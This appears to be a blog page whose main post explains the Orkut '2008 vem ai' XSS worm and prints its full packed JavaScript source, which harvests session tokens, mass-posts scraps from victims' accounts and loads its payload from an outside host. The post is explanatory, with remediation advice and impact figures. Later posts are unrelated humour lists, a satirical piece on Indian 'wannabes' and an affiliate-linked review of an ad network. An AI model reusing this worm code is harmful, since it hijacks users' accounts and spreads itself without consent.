Orkut XSS attack - that "2008 vem ai... que ele comece mto bem para vc" thingie

Orkut XSS Attack - "2008 vem ai... que ele comece mto bem para vc" thing

A lot of you have probably been wondering how you received a scrap saying " 2008 vem ai... que ele comece mto bem para vc" from me or possibly from some friend of yours.

Its called xss attack or cross site scripting attack. A piece of javascript code(on clients side that is your browser) gets executed, when you receive a scrap from your friends id(obviously after his orkut session is infected with the malicious code) with the spam message and started scrapping everyone. This happens when you log into your orkut scrapbook to read the malicious scrap.

When someone sends you a spam scrap and you read that the same scrap is sent to your friends from your account. This will spread for the coming few days possibly till orkut takes some measures.

Steps you can take:

If possible change your gmail account password and do not login to orkut till they sort this out.

Courtesy: Antrix.net(find link in comments)

The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js

function $(p,a,c,k,e,d) {

e=function(c) {

   return(c35?String.fromCharCode(c+29):c.toString(36))

};

if(!''.replace(/^/,String)){

   while(c--){d[e(c)]=k[c]||e(c)}

   k=[function(e){return d[e]}];

   e=function(){return'\\w+'};

   c=1

};

while(c--){

   if(k[c]){

       p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])

   }

}

return p

};

setTimeout(

$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}

L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};

7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+

(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");

8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1)

{h=l.S(A);6(h!=0){b 2h}}16{h+=2};

5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};

7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")

+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};

7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7()

{6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");

t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0))

;f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};

3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();

3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);

3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);

3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};

7 V(){6(j==8.18("N").M){b};

5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>

[1j]25 "+i F()+"[/1j]<1k/><13 1o="\\" 2a="\\" 2e="\\" r="8.1n(\'r\'); r.1o=" 1c="\\" 1e="\\">";

5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();

3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");

3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};

6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();

',62,150,'|||xml||var|if|function|document|domain|send|

return|path|wDate||select|name|begin|new|index|

www|dc|expires|encodeURIComponent|http|com|POST|script|

wormdoorkut|div|end|getCookie|orkut||cookie|aspx

|prefix|createXMLHttpRequest|true|getElementsByTagName|S

IG|Date|loadFriends|POST_TOKEN|scrapText|null|

signature|catch|length|selectedList|item|value|application|

open|indexOf|cmm_join|secure|sendScrap|setCookie|

readyState|onreadystatechange|try|Content|86400

|setRequestHeader|embed|ActiveXObject|Action|else|form|

getElementById|escape|status|urlencoded|200|setTime

|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|

createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|

GMT|go|GET|Compose|width|innerHTML|height|option|

setAttribute|id|submit|style|display|none|removeChild

|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|

history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|

raw|LoL|Msxml2|type|Microsoft|shockwave|flash|

wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera

|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1

);

author="Rodrigo Lacerda"



The orkut website is built on asp.net,

if you wish to read the technical side

of preventing xss attacks in asp.net go here 



Update:

1.) The problem seems to have sorted out by orkut in

2 days(thats long)

2.) 400,000 users affected.

3.) Top users affected by country

US, Germany, India, Brazil

4.) Orkut has still not accepted it was

a mistake from their side.The official orkut blog

is still mum on the incidence.

5.) Your password is safe, though it was possible

to hack your gmail password if say the virus

redirected to you to a page which looked

exactly like orkut and asked you to relogin.



A

Read More

Few questions no one has answers to(and noone cares)

Since we were kids we were always told to shut up when we asked the grown ups questions they did not know answers too like when your dad would ask your mom to tell anyone who calls he is not home and you would go why

Eventually it becomes a habbit to not ask questions that no one has answers to unless you happen to be me so here goes the world blame me all you will i dare to ask yet again!


1. If earth is in solar system and solar system is in galaxy and galaxy is in universe what is the universe in?

2. If sky is blue because the oceans blue how is the ocean blue?

3. Why is the most beautiful girl in class always in the next class, bus, car, train, plane?

4. Between a girl and a guy, how is a guy always wrong?

5. If humans evolved from monkeys what did monkeys evolve from?

6. Why doesnt "tulsi" virani get old and die

7. If marriage is a holy instituion how do we graduate from it?

8. Why do guys become bald after marriage?

9. Why do women live longer than guys?

10. Why are chromosomes named x and y and not a and b?

11.Why do people constantly return to the refrigerator with hopes that something new to eat will have materialized? (heard somewhere)

12. Whenever an adult is kidnapped why isn't it called adultnapped??(heard somewhere)

13. Why do we all think we sing well?

14. Can a school teacher give a homeless child homework?(heard somewhere)

15. If god is great and great souls are humble why does he wanne be worshipped?

16. Why is Mickey Mouse bigger than his dog Pluto?(heard somewhere)

17. Why is it called a "building" when it is already built?(heard somewhere)

18. Why does the red light always go on as you reach a traffic signal

19. Why is the traffic slow everytime you have to reach somewhere in hurry?

20. Why cant you find things when you are desperate to find them?

21. Why do superheroes wear underpants outside?

Read More

Welcome to the wannabe nation

This post is about a nation obsessed with being someone else completely hating its own identity and in trying to become someone else is ending up confused. Namaste, welcome to the most wannabe nation in the world. welcome to India.


You know someone is a wannabe when

1. When you work in a call center asking Americans to pay their bills but look down upon to the domestic call center guy who tells Indians to pay the bills

2. You completely despise bidhi(Desi ciggrate) but sell your dogs food to go to a hookah bar

3. You wear short tees really short and keep pulling them down

4. You wear low waist jeans really low(or loose fit)jeans and keep pulling them up

5. Your mom goes for kittyy parties not knowing who was a kitty why did she start such sad party

6. The bouncers at the disco see you more often than the guy who made the mistake of giving you birth(bless that poor soul)

7. You adore shakira, deepika padukone, bipasha and all the dusky women but would look for a "fair girl" when wanting to get married

8. You code cause it pays well, you copy every line of code from Google and write your name in the comment section

9. You wait for your chance to get a on site project and then come home tell people it was fun and you dated American chicks smartly hiding the 16 hr work shifts and countless abuses from Americans not to forget none of the American chicks looked at you while you were there.

10. You look for a wife/husband on those online matrimony sites but match religion, caste, kundli and want traditional wife/husband

11. You sell your chaddis to get on page 3 not realizing noone reads page but yourself and other wannabes.

12. Your name just got mutilated and you feel happy about it Vishal became vishy, pooja become poo(isn't that a dogs name? a diseased dumb dog?) 


13. You call everyone a dude, everyone, your mom, your dog, cause everyone else calls your dude instead of dodo which they should call you

14. You completely agree that god doesn't exist but are seen at siddhivinayaka temple after exams doing some scintific research with folded hands


I'm not done yet, more coming...

Read More

mGinger Mobile Ad Network Review

MGinger Social Adnetwork

There has been a lot of buzz on the internet specially the social networking sites like Orkut about mGinger, its a mobile ad network that pays you to read ads on your mobile.

The idea is simple like all other multi level marketing schemes, you join and refer your friends, your friends refer their friends and you have a 2 tier network going.

When your friends or their friends reads a ad on their mobile you get a share of the profit.
According to their website the average earning if you just refer 10 friends who refer 10 of their friends will be 1860 which is not bad.

But whether advertisers will buy mGinger is still a question. Everyone knows when people get paid to watch ads thats exactly what they do watch ads to get paid not because they are genuinely interested, expect a lot of fake profiles, fake mobiles, people selecting all categories just to receive ads a lot of fraud.

In my view advertisers will stay away from such schemes unless the profiles can be screened.
basically from a advertisers point of view paying by audience to see my message is a bad idea.

But then you never know lets wait and watch if this ginger spices up my wallet as well.

Visit mGinger Website(aff)

Read More

How to be remarkable

1. Understand the urgency of the situation. Half-measures simply won’t do. The only way to grow is to abandon your strategy of doing what you did yesterday, but better. Commit.

2. Remarkable doesn’t mean remarkable to you. It means remarkable to me. Am I going to make a remark about it? If not, then you’re average, and average is for losers.

3. Being noticed is not the same as being remarkable. Running down the street naked will get you noticed, but it won’t accomplish much. It’s easy to pull off a stunt, but not useful.

4. Extremism in the pursuit of remarkability is no sin. In fact, it’s practically a requirement. People in first place, those considered the best in the world, these are the folks that get what they want. Rock stars have groupies because they’re stars, not because they’re good looking.

5. Remarkability lies in the edges. The biggest, fastest, slowest, richest, easiest, most difficult. It doesn’t always matter which edge, more that you’re at (or beyond) the edge.

6. Not everyone appreciates your efforts to be remarkable. In fact, most people don’t. So what? Most people are ostriches, heads in the sand, unable to help you anyway. Your goal isn’t to please everyone. Your goal is to please those that actually speak up, spread the word, buy new things or hire the talented.

7. If it’s in a manual, if it’s the accepted wisdom, if you can find it in a Dummies book, then guess what? It’s boring, not remarkable. Part of what it takes to do something remarkable is to do something first and best. Roger Bannister was remarkable. The next guy, the guy who broke Bannister’s record wasn’t. He was just faster … but it doesn’t matter.

8. It’s not really as frightening as it seems. They keep the masses in line by threatening them (us) with all manner of horrible outcomes if we dare to step out of line. But who loses their jobs at the mass layoffs? Who has trouble finding a new gig? Not the remarkable minority, that’s for sure.

9. If you put it on a T-shirt, would people wear it? No use being remarkable at something that people don’t care about. Not ALL people, mind you, just a few. A few people insanely focused on what you do is far far better than thousands of people who might be mildly interested, right?

10. What’s fashionable soon becomes unfashionable. While you might be remarkable for a time, if you don’t reinvest and reinvent, you won’t be for long. Instead of resting on your laurels, you must commit to being remarkable again quite soon.

Read More